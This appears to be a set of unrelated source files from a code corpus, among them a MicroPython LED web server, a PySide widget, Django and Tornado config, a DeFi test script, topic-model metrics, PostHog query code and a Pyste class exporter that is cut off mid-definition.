<link rel="icon" href="data:,"> <style>html{font-family: Helvetica; display:inline-block; margin: 0px auto; text-align: center;}
h1{color: #0F3376; padding: 2vh;}p{font-size: 1.5rem;}.button{display: inline-block; background-color: #e7bd3b; border: none;
border-radius: 4px; color: white; padding: 16px 40px; text-decoration: none; font-size: 30px; margin: 2px; cursor: pointer;}
.button2{background-color: #4286f4;}</style></head><body> <h1>ESP Web Server</h1>
<p>GPIO state: <strong>""" + gpio_state + """</strong></p><p><a href="/?led=on"><button class="button">ON</button></a></p>
<p><a href="/?led=off"><button class="button button2">OFF</button></a></p></body></html>"""
return html
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 80))
s.listen(5)
while True:
print("\n---- Lire la requête et envoyer la page ----")
conn, addr = s.accept()
print('Got a connection from %s' % str(addr))
request = conn.recv(1024)
request = str(request)
print('Content = %s' % request)
led_on = request.find('/?led=on')
led_off = request.find('/?led=off')
if led_on == 6:
print('LED ON')
led_in.value(1)
led_ext.value(1)
if led_off == 6:
print('LED OFF')
led_in.value(0)
led_ext.value(0)
response = web_page()
conn.send('HTTP/1.1 200 OK\n')
conn.send('Content-Type: text/html\n')
conn.send('Connection: close\n\n')
conn.sendall(response)
conn.close()
| StarcoderdataPython |
4822031 | <reponame>LoicBoileau/Projet-S4---Robot-Delta
"""
/*
* This file is part of PySide: Python for Qt
*
* Copyright (C) 2009 Nokia Corporation and/or its subsidiary(-ies).
*
* Contact: PySide team <<EMAIL>>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* version 2.1 as published by the Free Software Foundation.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*
*/
"""
from PySide.QtCore import *
from PySide.QtGui import *
from utils import *
class PixmapWidgetPrivate(object):
def __init__(self, pixmap=None):
self.topBorder = 0
self.leftBorder = 0
self.rightBorder = 0
self.bottomBorder = 0
self.pixmap = pixmap
class PixmapWidget(QGraphicsWidget):
def __init__(self, pixmap, parent = None):
QGraphicsWidget.__init__(self, parent)
self._d = PixmapWidgetPrivate()
self.setPixmap(pixmap)
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed);
def pixmap(self):
return self._d.pixmap
def setPixmap(self, pixmap):
self._d.pixmap = pixmap
if pixmap.isNull():
self.setPreferredSize(QSizeF())
else:
self.setPreferredSize(QSizeF(pixmap.size()))
self.update()
self.updateGeometry()
def getBorders(self):
return (self._d.leftBorder, self._d.topBorder, self._d.topBorder, self._d.rightBorder, self._d.bottomBorder)
def setBorders(self, left, top, right, bottom):
self._d.leftBorder = left
self._d.topBorder = top
self._d.rightBorder = right
self._d.bottomBorder = bottom
seld.update()
def paint(self, painter, option, widget):
bDrawPixmap(painter, self._d.pixmap, self.boundingRect(), self._d.leftBorder, self._d.topBorder, self._d.rightBorder, self._d.bottomBorder)
| StarcoderdataPython |
95195 | import tornado.web
from settings import site_settings
apps = [
# (r'/prefix', 'app_name')
# appA
# __init__.py
# urls.py
(r"/api", "api"),
]
urls = [
# (r'relative_url', 'RequestHandler')
(r"/static", tornado.web.StaticFileHandler,
dict(path=site_settings['static_path'])),
]
| StarcoderdataPython |
1612028 | # Generated by Django 2.0.8 on 2019-03-19 16:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('caseFiles', '0006_casefile_file_pdf'),
]
operations = [
migrations.RemoveField(
model_name='casefile',
name='file_page1',
),
migrations.RemoveField(
model_name='casefile',
name='file_page2',
),
migrations.RemoveField(
model_name='casefile',
name='file_page3',
),
migrations.RemoveField(
model_name='casefile',
name='file_page4',
),
migrations.RemoveField(
model_name='casefile',
name='file_page5',
),
]
| StarcoderdataPython |
145443 | <gh_stars>1-10
from random import choice
def main():
amount_students = 1000
amount_wishes = 100
print(amount_students)
for student_number in range(1, amount_students + 1):
wishes = []
for _ in range(amount_wishes):
while str(wish := choice(range(1, amount_students + 1))) in wishes:
pass
wishes.append(str(wish))
print(" ".join(wishes))
if __name__ == "__main__":
main()
| StarcoderdataPython |
1681655 | <gh_stars>1-10
"""
Loader module is the interface into the datagen data generation utility. This class handles loading, parsing and
delegating the handling of various data types.
"""
import json
from typing import Union, Dict
from . import suppliers
from . import utils
from .exceptions import SpecException
from .model import DataSpec
from .schemas import validate_schema_for_spec
from .types import lookup_type, lookup_schema, registry
class Refs:
"""
Holder object for references
"""
def __init__(self, refspec):
if refspec:
self.refspec = refspec
else:
self.refspec = {}
def get(self, key):
""" get the ref for the key """
return self.refspec.get(key)
class Loader:
"""
Parent object for loading value suppliers from specs
"""
RESERVED = ['type', 'data', 'ref', 'refs', 'config']
def __init__(self, data_spec, data_dir='./data', enforce_schema=False):
raw_spec = utils.get_raw_spec(data_spec)
self.specs = preprocess_spec(raw_spec)
self.datadir = data_dir
self.enforce_schema = enforce_schema
self.cache = {}
self.refs = Refs(self.specs.get('refs'))
def get(self, key):
"""
Retrieve the value supplier for the given field or ref key
:param key: key to for field or ref name
"""
if key in self.cache:
return self.cache[key]
data_spec = self.specs.get(key)
if data_spec is None:
data_spec = self.refs.get(key)
if data_spec is None:
raise SpecException("No key " + key + " found in specs")
supplier = self.get_from_spec(data_spec)
self.cache[key] = supplier
return supplier
def get_from_spec(self, field_spec):
"""
Retrieve the value supplier for the given field spec
"""
if isinstance(field_spec, list):
spec_type = None
elif isinstance(field_spec, dict):
spec_type = field_spec.get('type')
else:
# assume it is data, so values?
spec_type = 'values'
if spec_type == 'configref':
raise SpecException(f'Cannot use configref as source of data: {json.dumps(field_spec)}')
if spec_type is None or spec_type == 'values':
if self.enforce_schema:
_validate_schema_for_spec(spec_type, field_spec)
supplier = suppliers.values(field_spec, self)
else:
handler = lookup_type(spec_type)
if handler is None:
raise SpecException('Unable to load handler for: ' + json.dumps(field_spec))
if self.enforce_schema:
_validate_schema_for_spec(spec_type, field_spec)
supplier = handler(field_spec, self)
if suppliers.is_cast(field_spec):
supplier = suppliers.cast_supplier(supplier, field_spec)
if suppliers.is_decorated(field_spec):
supplier = suppliers.decorated(field_spec, supplier)
if suppliers.is_buffered(field_spec):
supplier = suppliers.buffered(supplier, field_spec)
return supplier
def get_ref_spec(self, key):
""" returns the spec for the ref with the provided key """
return self.refs.get(key)
def _validate_schema_for_spec(spec_type, field_spec):
type_schema = lookup_schema(spec_type)
if type_schema is None:
return
validate_schema_for_spec(spec_type, field_spec, type_schema)
def preprocess_spec(data_spec: Union[Dict[str, Dict], DataSpec]):
"""
Uses the registered preprocessors to cumulatively update the spec
:param data_spec: to preprocess
:return: updated version of the spec after all preprocessors have run on it
"""
raw_spec = utils.get_raw_spec(data_spec)
updated = dict(raw_spec)
preprocessors = registry.preprocessors.get_all()
for name in preprocessors:
preprocessor = registry.preprocessors.get(name)
updated = preprocessor(updated)
return updated
| StarcoderdataPython |
175806 | from brownie import (
accounts, ERC20KP3ROracle, UniswapV2Oracle, ProxyOracle, CoreOracle,
CurveOracle, WERC20, UbeswapV1Oracle, HomoraBank, UniswapV2SpellV1, SafeBox,
SimpleOracle, WStakingRewards
)
from brownie import interface
from .utils import *
import json
def main():
deployer = accounts.load('admin')
alice = accounts.load('alice')
f = open('scripts/dahlia_addresses.json')
addr = json.load(f)['mainnet']
celo = interface.IERC20Ex(addr['celo'])
ube = interface.IERC20Ex(addr['ube'])
dahlia_bank = HomoraBank.at(addr['dahlia_bank'])
uniswap_spell = UniswapV2SpellV1.at(addr['uniswap_spell'])
core_oracle = CoreOracle.at(addr['core_oracle'])
wstaking = WStakingRewards.at(addr['ube_celo_w_staking'])
celo.approve(dahlia_bank, 2**256-1, {'from': alice})
ube.approve(dahlia_bank, 2**256-1, {'from': alice})
# # open a position
# dahlia_bank.execute(
# 0,
# uniswap_spell,
# uniswap_spell.addLiquidityWERC20.encode_input(
# celo,
# ube,
# [10**10, # collateral amount celo
# 0, # collateral amount ube
# 0,
# 10**10, # borrow amount celo
# 0, # borrow amount ube
# 0,
# 0,
# 0],
# ),
# {
# 'from': alice,
# }
# )
# # open a position
# dahlia_bank.execute(
# 0,
# uniswap_spell,
# uniswap_spell.addLiquidityWStakingRewards.encode_input(
# celo,
# ube,
# [10**10, # collateral amount celo
# 0, # collateral amount ube
# 0,
# 10**10, # borrow amount celo
# 0, # borrow amount ube
# 0,
# 0,
# 0],
# wstaking
# ),
# {
# 'from': alice,
# }
# )
# market fluctuations
ubepx = core_oracle.getCELOPx(ube)
simple_oracle = SimpleOracle.deploy({'from': deployer})
simple_oracle.setCELOPx([ube], [int(ubepx/10)])
core_oracle.setRoute([
ube,
], [
simple_oracle,
], {'from': deployer})
print('Done!') | StarcoderdataPython |
3993 | """Hyper-distributions."""
from libqif.core.secrets import Secrets
from libqif.core.channel import Channel
from numpy import array, arange, zeros
from numpy import delete as npdelete
class Hyper:
def __init__(self, channel):
"""Hyper-distribution. To create an instance of this class it is
class it is necessary to have an instance of :py:class:`.Channel`
class. Once created an instance of :py:class:`.Hyper`, the constructor
generates the joint, outer and inner distributions.
Attributes
----------
channel : core.Channel
Channel object.
joint : numpy.ndarray
Matrix of joint distribution.
outer : numpy.ndarray
Outer distribution.
inners : numpy.ndarray
Matrix of inner distributions.
num_posteriors : int
Number of posterior distributions resulted by reducing the
hyper-distribution, i.e., remove columns that contains only
zeros and merge columns which one of them a linear combination
of the other.
Parameters
----------
channel : core.Channel
Channel object.
"""
self._check_types(channel)
self.channel = channel
self.joint = self._generate_joint_distribution()
self.outer, self.inners = self._generate_posteriors()
self._reduce_hyper()
self.num_posteriors = len(self.outer)
def update_prior(self, prior):
"""Update the prior distribution on set of secrets.
The number of secrets must match the current number of rows of the channel.
Parameters
----------
prior : list, numpy.ndarray
Prior distribution on the set of secrets. prior[i] is the
probability of secret named labels[i] beeing the real secret.
"""
self.channel.update_prior(prior)
self.joint = self._generate_joint_distribution()
self.outer, self.inners = self._generate_posteriors()
self._reduce_hyper()
self.num_posteriors = len(self.outer)
def _check_types(self, channel):
if type(channel) != type(Channel(Secrets(['x1','x2'], [1,0]), ['y1'], array([[1],[1]]))):
raise TypeError('The parameter \'channel\' must be a core.channel.Channel object')
def _generate_joint_distribution(self):
joint = []
channel_t = self.channel.matrix.T
for i in arange(self.channel.num_outputs):
joint.append(self.channel.secrets.prior * channel_t[i])
return array(joint).T
def _generate_posteriors(self):
joint_t = self.joint.T.copy()
outer = []
for i in arange(self.channel.num_outputs):
outer.append(joint_t[i].sum())
if outer[i] > 0:
joint_t[i] = joint_t[i]/outer[i]
return array(outer), joint_t.T
def _reduce_hyper(self):
"""Given the hyper-distribution generated by _generate_posteriors
remove columns with zeros and merge columns that are a linear
combination of others. Thus algorithm has time complexity of O(n*m^2)
where n is the number of secrets and m is the number of outputs in
the.
"""
epsilon = 10**(-6)
# Delete inners that have 0 probability of occuring
zero_prob = self.outer < epsilon
self.outer = npdelete(self.outer, zero_prob, 0)
self.inners = npdelete(self.inners, zero_prob, 1)
delete_inner = [False] * len(self.outer)
for i in arange(self.inners.shape[1]):
for j in arange(i+1, self.inners.shape[1]):
# Check if inner i is equal to inner j
if (abs(self.inners[:,i] - self.inners[:,j]) < epsilon).sum() == self.channel.secrets.num_secrets:
delete_inner[j] = True # Delete inner j
self.outer[i] += self.outer[j] # Merge inner j into inner i
self.outer = npdelete(self.outer, delete_inner, 0)
self.inners = npdelete(self.inners, delete_inner, 1)
| StarcoderdataPython |
1638719 | import sys
from ephyviewer.myqt import QT_MODE
if QT_MODE == 'PyQt5':
from . import icons_PyQt5 as icons
elif QT_MODE == 'PySide2':
from . import icons_PySide2 as icons
elif QT_MODE == 'PyQt4':
from . import icons_PyQt4 as icons
else:
raise ValueError('Could not load icons for unrecognized QT_MODE: ' + QT_MODE)
| StarcoderdataPython |
114966 | import torch
from .EMA import EMA
class PhysicsGuide:
def __init__(self, hand_model, object_model, penetration_model, fc_loss_model, args):
self.epsilon = 1e-4
self.hand_model = hand_model
self.object_model = object_model
self.penetration_model = penetration_model
self.fc_loss_model = fc_loss_model
self.args = args
self.grad_ema = EMA(0.98)
self.ones = torch.ones([self.args.batch_size, self.hand_model.num_points], device='cuda') # B x V
self.arange = torch.arange(self.args.batch_size).cuda()
self.rejection_count = torch.zeros([self.args.batch_size, 1], device='cuda', dtype=torch.long)
def initialize(self, object_code, z, contact_point_indices):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = self.compute_energy(object_code, z, contact_point_indices, verbose=True)
energy = linear_independence + force_closure + surface_distance + penetration + z_norm + normal_alignment
grad = torch.autograd.grad(energy.sum(), z)[0]
self.grad_ema.apply(grad)
return energy, grad, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
def compute_energy(self, object_code, z, contact_point_indices, verbose=False):
hand_verts = self.hand_model.get_vertices(z)
contact_point = torch.gather(hand_verts, 1, torch.tile(contact_point_indices.unsqueeze(-1), [1,1,3]))
contact_distance = self.object_model.distance(object_code, contact_point)
contact_normal = self.object_model.gradient(contact_point, contact_distance, create_graph=True, retain_graph=True)
contact_normal += torch.normal(0, self.epsilon, contact_normal.shape, device=contact_normal.device, dtype=contact_normal.dtype)
contact_normal = contact_normal / torch.norm(contact_normal, dim=-1, keepdim=True)
hand_normal = self.hand_model.get_surface_normals(verts=hand_verts)
hand_normal = torch.gather(hand_normal, 1, torch.tile(contact_point_indices.unsqueeze(-1), [1,1,3]))
hand_normal += torch.normal(0, self.epsilon, hand_normal.shape, device=hand_normal.device, dtype=hand_normal.dtype)
hand_normal = hand_normal / torch.norm(hand_normal, dim=-1, keepdim=True)
normal_alignment = 1 - ((hand_normal * contact_normal).sum(-1) + 1).sum(-1) / self.args.n_contact
linear_independence, force_closure = self.fc_loss_model.fc_loss(contact_point, contact_normal, object_code)
surface_distance = self.fc_loss_model.dist_loss(object_code, contact_point)
penetration = self.penetration_model.get_penetration(object_code, z) * 10 # B x V
hand_prior = self.hand_model.prior(z) * self.args.hprior_weight
if verbose:
return linear_independence, force_closure, surface_distance.sum(1), penetration.sum(1), hand_prior, normal_alignment
else:
return linear_independence + force_closure + surface_distance.sum(1) + penetration.sum(1) + hand_prior + normal_alignment
def get_stepsize(self, energy):
return 0.02600707 + energy.unsqueeze(1) * 0.03950357 * 1e-3
def get_temperature(self, energy):
return 0.02600707 + energy * 0.03950357
def optimize(self, energy, grad, object_code, z, contact_point_indices, verbose_energy):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = verbose_energy
batch_size = len(energy)
step_size = self.get_stepsize(energy)
temperature = self.get_temperature(energy)
switch = torch.rand([batch_size, 1], device='cuda')
# update z by langevin
noise = torch.normal(mean=0, std=self.args.noise_size, size=z.shape, device='cuda', dtype=torch.float) * step_size
new_z = z - 0.5 * grad / self.grad_ema.average.unsqueeze(0) * step_size * step_size + noise
# linear_independence, force_closure, surface_distance, penetration, hand_prior, normal_alignment = self.compute_energy(object_code, new_z, contact_point_indices, verbose=True)
# print('linear_independence', linear_independence.mean().detach().cpu().numpy())
# print('force_closure', force_closure.mean().detach().cpu().numpy())
# print('surface_distance', surface_distance.mean().detach().cpu().numpy())
# print('penetration', penetration.mean().detach().cpu().numpy())
# print('hand_prior', hand_prior.mean().detach().cpu().numpy())
# print('normal_alignment', normal_alignment.mean().detach().cpu().numpy())
# exit()
# update contact point by random sampling
new_contact_point_indices = contact_point_indices.clone()
update_indices = torch.randint(0, self.args.n_contact, size=[self.args.batch_size], device='cuda')
prob = self.ones.clone()
prob[torch.unsqueeze(self.arange, 1), contact_point_indices] = 0
# sample update_to indices
if self.args.hand_model == 'mano_fingertip':
update_to = torch.randint(0, self.hand_model.num_fingertips, size=[self.args.batch_size], device='cuda')
update_to = self.hand_model.fingertip_indices[update_to]
else:
update_to = torch.randint(0, self.hand_model.num_points, size=[self.args.batch_size], device='cuda')
new_contact_point_indices[self.arange, update_indices] = update_to
# merge by switch
update_H = ((switch < self.args.langevin_probability) * (self.rejection_count < 2))
new_z = new_z * update_H + z * ~update_H
new_contact_point_indices = new_contact_point_indices * (~update_H) + contact_point_indices * update_H
# compute new energy
new_linear_independence, new_force_closure, new_surface_distance, new_penetration, new_z_norm, new_normal_alignment = self.compute_energy(object_code, new_z, new_contact_point_indices, verbose=True)
new_energy = new_linear_independence + new_force_closure + new_surface_distance + new_penetration + new_z_norm + new_normal_alignment
new_grad = torch.autograd.grad(new_energy.sum(), new_z)[0]
# accept by Metropolis-Hasting algorithm
with torch.no_grad():
# metropolis-hasting
alpha = torch.rand(self.args.batch_size, device='cuda', dtype=torch.float)
accept = alpha < torch.exp((energy - new_energy) / temperature)
z[accept] = new_z[accept]
contact_point_indices[accept] = new_contact_point_indices[accept]
energy[accept] = new_energy[accept]
grad[accept] = new_grad[accept]
linear_independence[accept] = new_linear_independence[accept]
force_closure[accept] = new_force_closure[accept]
surface_distance[accept] = new_surface_distance[accept]
penetration[accept] = new_penetration[accept]
z_norm[accept] = new_z_norm[accept]
normal_alignment[accept] = new_normal_alignment[accept]
self.rejection_count[accept] = 0
self.rejection_count[~accept] += 1
self.grad_ema.apply(grad)
# print('delta-z: %f delta-i: %f accept: %f'%(torch.norm(z - old_z), torch.norm(contact_point_indices.float() - old_ind.float()), accept.sum()))
return energy, grad, z, contact_point_indices, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
def refine(self, energy, grad, object_code, z, contact_point_indices, verbose_energy):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = verbose_energy
step_size = 0.1
temperature = 1e-3
# update z by langevin
noise = torch.normal(mean=0, std=self.args.noise_size, size=z.shape, device='cuda', dtype=torch.float) * step_size
new_z = z - 0.5 * grad / self.grad_ema.average.unsqueeze(0) * step_size * step_size + noise
new_linear_independence, new_force_closure, new_surface_distance, new_penetration, new_z_norm, new_normal_alignment = self.compute_energy(object_code, new_z, contact_point_indices, verbose=True)
new_energy = new_linear_independence + new_force_closure + new_surface_distance + new_penetration + new_z_norm + new_normal_alignment
new_grad = torch.autograd.grad(new_energy.sum(), new_z)[0]
self.grad_ema.apply(grad)
with torch.no_grad():
# metropolis-hasting
alpha = torch.rand(self.args.batch_size, device='cuda', dtype=torch.float)
accept = alpha < torch.exp((energy - new_energy) / temperature)
z[accept] = new_z[accept]
energy[accept] = new_energy[accept]
grad[accept] = new_grad[accept]
linear_independence[accept] = new_linear_independence[accept]
force_closure[accept] = new_force_closure[accept]
surface_distance[accept] = new_surface_distance[accept]
penetration[accept] = new_penetration[accept]
z_norm[accept] = new_z_norm[accept]
normal_alignment[accept] = new_normal_alignment[accept]
self.grad_ema.apply(grad)
return energy, grad, z, contact_point_indices, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
| StarcoderdataPython |
1608395 | import numpy as np
from utils.rbo import rbo as rbo_utils
from itertools import combinations
def proportion_common_words(topics, topk=10):
"""
compute proportion of unique words
Parameters
----------
topics: a list of lists of words
topk: top k words on which the topic diversity will be computed
Returns
-------
pcw : proportion of common words
"""
if topk > len(topics[0]):
raise Exception('Words in topics are less than '+str(topk))
else:
unique_words = set()
for topic in topics:
unique_words = unique_words.union(set(topic[:topk]))
puw = 1 - (len(unique_words) / (topk * len(topics)))
return puw
def rbo(topics, weight=0.9, topk=10):
"""
compute rank-biased overlap
Parameters
----------
topics: a list of lists of words
topk: top k words on which the topic diversity
will be computed
weight: p (float), default 1.0: Weight of each
agreement at depth d:p**(d-1). When set
to 1.0, there is no weight, the rbo returns
to average overlap.
Returns
-------
rbo : score of the rank biased overlap over the topics
"""
if topk > len(topics[0]):
raise Exception('Words in topics are less than topk')
else:
collect = []
for list1, list2 in combinations(topics, 2):
word2index = get_word2index(list1, list2)
indexed_list1 = [word2index[word] for word in list1]
indexed_list2 = [word2index[word] for word in list2]
rbo_val = rbo_utils(indexed_list1[:topk], indexed_list2[:topk], p=weight)[2]
collect.append(rbo_val)
return np.mean(collect)
def pairwise_jaccard_similarity(topics, topk=10):
sim = 0
count = 0
for list1, list2 in combinations(topics, 2):
intersection = len(list(set(list1[:topk]).intersection(list2[:topk])))
union = (len(list1[:topk]) + len(list2[:topk])) - intersection
count = count + 1
sim = sim + (float(intersection) / union)
return sim/count
def get_word2index(list1, list2):
words = set(list1)
words = words.union(set(list2))
word2index = {w: i for i, w in enumerate(words)}
return word2index
| StarcoderdataPython |
3307260 | import json
import os
import unittest
from mock import Mock
from testfixtures import compare, Replacer
from deployfish.terraform import Terraform
YAML = {
'statefile': 's3://foobar/baz',
'lookups': {
'lookup1': 'proxy-{environment}-cluster-name',
'lookup2': 'proxy-{environment}-elb-id',
'lookup3': 'proxy-{environment}-autoscalinggroup-name',
'lookup4': 'security-group-list'
}
}
class TestTerraform_load_yaml(unittest.TestCase):
def setUp(self):
with Replacer() as r:
r.replace('deployfish.terraform.Terraform.get_terraform_state', Mock())
self.terraform = Terraform(YAML)
def test_lookups(self):
compare(self.terraform.lookups, {
'lookup1': 'proxy-{environment}-cluster-name',
'lookup2': 'proxy-{environment}-elb-id',
'lookup3': 'proxy-{environment}-autoscalinggroup-name',
'lookup4': 'security-group-list',
})
class TestTerraform_get_terraform_state(unittest.TestCase):
def setUp(self):
with Replacer() as r:
current_dir = os.path.dirname(os.path.abspath(__file__))
fname = os.path.join(current_dir, 'terraform.tfstate')
with open(fname) as f:
tfstate = json.loads(f.read())
get_mock = r('deployfish.terraform.Terraform._get_state_file_from_s3', Mock())
get_mock.return_value = tfstate
self.terraform = Terraform(YAML)
def test_lookup(self):
self.assertTrue('proxy-qa-cluster-name' in self.terraform)
class TestTerraform_lookup(unittest.TestCase):
def setUp(self):
with Replacer() as r:
current_dir = os.path.dirname(os.path.abspath(__file__))
fname = os.path.join(current_dir, 'terraform.tfstate')
with open(fname) as f:
tfstate = json.loads(f.read())
get_mock = r('deployfish.terraform.Terraform._get_state_file_from_s3', Mock())
get_mock.return_value = tfstate
self.terraform = Terraform(YAML)
def test_lookup(self):
self.assertEqual(self.terraform.lookup('lookup1', {'environment': 'qa'}), 'foobar-proxy-qa')
self.assertEqual(self.terraform.lookup('lookup1', {'environment': 'prod'}), 'foobar-proxy-prod')
self.assertListEqual(self.terraform.lookup('lookup4', {}), ['sg-1234567', 'sg-2345678', 'sg-3456789'])
| StarcoderdataPython |
4832251 | <filename>ee/clickhouse/queries/column_optimizer.py
from typing import List, Set, Tuple, Union, cast
from ee.clickhouse.materialized_columns.columns import ColumnName, get_materialized_columns
from ee.clickhouse.models.action import get_action_tables_and_properties, uses_elements_chain
from ee.clickhouse.models.property import extract_tables_and_properties
from posthog.constants import TREND_FILTER_TYPE_ACTIONS
from posthog.models.entity import Entity
from posthog.models.filters import Filter
from posthog.models.filters.mixins.utils import cached_property
from posthog.models.filters.path_filter import PathFilter
from posthog.models.filters.retention_filter import RetentionFilter
from posthog.models.property import Property, PropertyName, PropertyType
from posthog.models.team import Team
class ColumnOptimizer:
"""
This class is responsible for figuring out what columns can and should be materialized based on the query filter.
This speeds up queries since clickhouse ends up selecting less data.
"""
def __init__(self, filter: Union[Filter, PathFilter, RetentionFilter], team_id: int):
self.filter = filter
self.team_id = team_id
@cached_property
def materialized_event_columns_to_query(self) -> List[ColumnName]:
"Returns a list of event table columns containing materialized properties that this query needs"
materialized_columns = get_materialized_columns("events")
return [
materialized_columns[property_name]
for property_name, type in self._used_properties_with_type("event")
if property_name in materialized_columns
]
@cached_property
def materialized_person_columns_to_query(self) -> List[ColumnName]:
"Returns a list of person table columns containing materialized properties that this query needs"
materialized_columns = get_materialized_columns("person")
return [
materialized_columns[property_name]
for property_name, type in self._used_properties_with_type("person")
if property_name in materialized_columns
]
@cached_property
def should_query_event_properties_column(self) -> bool:
return len(self.materialized_event_columns_to_query) != len(self._used_properties_with_type("event"))
@cached_property
def should_query_person_properties_column(self) -> bool:
return len(self.materialized_person_columns_to_query) != len(self._used_properties_with_type("person"))
@cached_property
def is_using_person_properties(self) -> bool:
return len(self._used_properties_with_type("person")) > 0
@cached_property
def should_query_elements_chain_column(self) -> bool:
"Returns whether this query uses elements_chain"
has_element_type_property = lambda properties: any(prop.type == "element" for prop in properties)
if has_element_type_property(self.filter.properties):
return True
if self.filter.filter_test_accounts:
test_account_filters = Team.objects.only("test_account_filters").get(id=self.team_id).test_account_filters
properties = [Property(**prop) for prop in test_account_filters]
if has_element_type_property(properties):
return True
# Both entities and funnel exclusions can contain nested elements_chain inclusions
for entity in self.filter.entities + cast(List[Entity], self.filter.exclusions):
if has_element_type_property(entity.properties):
return True
# :TRICKY: Action definition may contain elements_chain usage
#
# See ee/clickhouse/models/action.py#format_action_filter for an example
if entity.type == TREND_FILTER_TYPE_ACTIONS:
if uses_elements_chain(entity.get_action()):
return True
return False
@cached_property
def properties_used_in_filter(self) -> Set[Tuple[PropertyName, PropertyType]]:
"Returns list of properties + types that this query would use"
result: Set[Tuple[PropertyName, PropertyType]] = set()
result |= extract_tables_and_properties(self.filter.properties)
if self.filter.filter_test_accounts:
test_account_filters = Team.objects.only("test_account_filters").get(id=self.team_id).test_account_filters
result |= extract_tables_and_properties([Property(**prop) for prop in test_account_filters])
# Some breakdown types read properties
#
# See ee/clickhouse/queries/trends/breakdown.py#get_query or
# ee/clickhouse/queries/breakdown_props.py#get_breakdown_prop_values
if self.filter.breakdown_type in ["event", "person"]:
# :TRICKY: We only support string breakdown for event/person properties
assert isinstance(self.filter.breakdown, str)
result.add((self.filter.breakdown, self.filter.breakdown_type))
# Both entities and funnel exclusions can contain nested property filters
for entity in self.filter.entities + cast(List[Entity], self.filter.exclusions):
result |= extract_tables_and_properties(entity.properties)
# Math properties are also implicitly used.
#
# See ee/clickhouse/queries/trends/util.py#process_math
if entity.math_property:
result.add((entity.math_property, "event"))
# :TRICKY: If action contains property filters, these need to be included
#
# See ee/clickhouse/models/action.py#format_action_filter for an example
if entity.type == TREND_FILTER_TYPE_ACTIONS:
result |= get_action_tables_and_properties(entity.get_action())
return result
def _used_properties_with_type(self, property_type: PropertyType) -> Set[Tuple[PropertyName, PropertyType]]:
return set((name, type) for name, type in self.properties_used_in_filter if type == property_type)
| StarcoderdataPython |
3272008 | <reponame>acidicMercury8/xray-1.0
import exporters
from Exporter import Exporter
from declarations import *
from enumerate import enumerate
from settings import *
from CodeUnit import CodeUnit
from EnumExporter import EnumExporter
#==============================================================================
# ClassExporter
#==============================================================================
class ClassExporter(Exporter):
'Generates boost.python code to export a class declaration'
def __init__(self, info, parser_tail=None):
Exporter.__init__(self, info, parser_tail)
# sections of code
self.sections = {}
# template: each item in the list is an item into the class_<...>
# section.
self.sections['template'] = []
# constructor: each item in the list is a parameter to the class_
# constructor, like class_<C>(...)
self.sections['constructor'] = []
# inside: everything within the class_<> statement
self.sections['inside'] = []
# scope: items outside the class statement but within its scope.
# scope* s = new scope(class<>());
# ...
# delete s;
self.sections['scope'] = []
# declarations: outside the BOOST_PYTHON_MODULE macro
self.sections['declaration'] = []
self.sections['include'] = []
# a list of Constructor instances
self.constructors = []
self.wrapper_generator = None
# a list of code units, generated by nested declarations
self.nested_codeunits = []
def ScopeName(self):
return _ID(self.class_.FullName()) + '_scope'
def Name(self):
return self.class_.FullName()
def SetDeclarations(self, declarations):
Exporter.SetDeclarations(self, declarations)
decl = self.GetDeclaration(self.info.name)
if isinstance(decl, Typedef):
self.class_ = self.GetDeclaration(decl.type.name)
if not self.info.rename:
self.info.rename = decl.name
else:
self.class_ = decl
self.public_members = \
[x for x in self.class_.members if x.visibility == Scope.public]
def Order(self):
'''Return the TOTAL number of bases that this class has, including the
bases' bases. Do this because base classes must be instantialized
before the derived classes in the module definition.
'''
def BasesCount(classname):
decl = self.GetDeclaration(classname)
bases = [x.name for x in decl.bases]
total = 0
for base in bases:
total += BasesCount(base)
return len(bases) + total
return BasesCount(self.class_.FullName())
def Export(self, codeunit, exported_names):
self.ExportBasics()
self.ExportBases(exported_names)
self.ExportConstructors()
self.ExportVariables()
self.ExportMethods()
self.ExportVirtualMethods()
self.ExportOperators()
self.ExportNestedClasses(exported_names)
self.ExportNestedEnums()
self.Write(codeunit)
def Write(self, codeunit):
indent = self.INDENT
boost_ns = namespaces.python
pyste_ns = namespaces.pyste
code = ''
# begin a scope for this class if needed
nested_codeunits = self.nested_codeunits
needs_scope = self.sections['scope'] or nested_codeunits
if needs_scope:
scope_name = self.ScopeName()
code += indent + boost_ns + 'scope* %s = new %sscope(\n' %\
(scope_name, boost_ns)
# export the template section
template_params = ', '.join(self.sections['template'])
code += indent + boost_ns + 'class_< %s >' % template_params
# export the constructor section
constructor_params = ', '.join(self.sections['constructor'])
code += '(%s)\n' % constructor_params
# export the inside section
in_indent = indent*2
for line in self.sections['inside']:
code += in_indent + line + '\n'
# write the scope section and end it
if not needs_scope:
code += indent + ';\n'
else:
code += indent + ');\n'
for line in self.sections['scope']:
code += indent + line + '\n'
# write the contents of the nested classes
for nested_unit in nested_codeunits:
code += '\n' + nested_unit.Section('module')
# close the scope
code += indent + 'delete %s;\n' % scope_name
# write the code to the module section in the codeunit
codeunit.Write('module', code + '\n')
# write the declarations to the codeunit
declarations = '\n'.join(self.sections['declaration'])
for nested_unit in nested_codeunits:
declarations += nested_unit.Section('declaration')
if declarations:
codeunit.Write('declaration', declarations + '\n')
# write the includes to the codeunit
includes = '\n'.join(self.sections['include'])
for nested_unit in nested_codeunits:
includes += nested_unit.Section('include')
if includes:
codeunit.Write('include', includes)
def Add(self, section, item):
'Add the item into the corresponding section'
self.sections[section].append(item)
def ExportBasics(self):
